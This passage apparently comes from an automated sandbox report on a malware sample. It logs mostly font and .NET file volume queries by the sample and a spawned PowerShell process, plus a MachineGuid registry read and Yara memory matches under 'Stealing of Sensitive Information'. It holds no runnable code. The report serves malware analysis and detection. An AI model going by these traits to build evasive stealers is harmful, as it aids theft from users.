                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\ROCKBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\RAGE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 0000000F.00000002.527278934.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 3984, type: MEMORYSTR
